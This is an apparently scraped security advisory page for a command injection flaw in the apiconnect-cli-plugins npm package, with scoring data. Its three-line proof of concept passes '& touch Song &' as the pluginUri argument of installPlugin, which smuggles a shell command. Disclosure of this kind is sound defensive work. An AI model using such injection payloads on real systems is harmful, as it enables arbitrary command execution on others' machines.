Lucene search

K
osvGoogleOSV:GHSA-C9M9-48PW-6MPV
HistoryMay 24, 2021 - 10:18 p.m.

apiconnect-cli-plugins vulnerable to OS Command Injection

2021-05-2422:18:13
Google
osv.dev
6
apiconnect-cli-plugins
os command injection
pluginuri
file lib/plugin-loader.js
function installplugin

AI Score

7.6

Confidence

High

EPSS

0.017

Percentile

88.0%

apiconnect-cli-plugins through 6.0.1 is vulnerable to Command Injection. It allows execution of arbitrary commands via the pluginUri argument.

PoC

var root = require("apiconnect-cli-plugins");
var payload = "& touch Song &";
root.pluginLoader.installPlugin(payload, "");

The injection point is located in line 181 of file lib/plugin-loader.js, in the function installPlugin(pluginUri, registryUri).

AI Score

7.6

Confidence

High

EPSS

0.017

Percentile

88.0%

Related for OSV:GHSA-C9M9-48PW-6MPV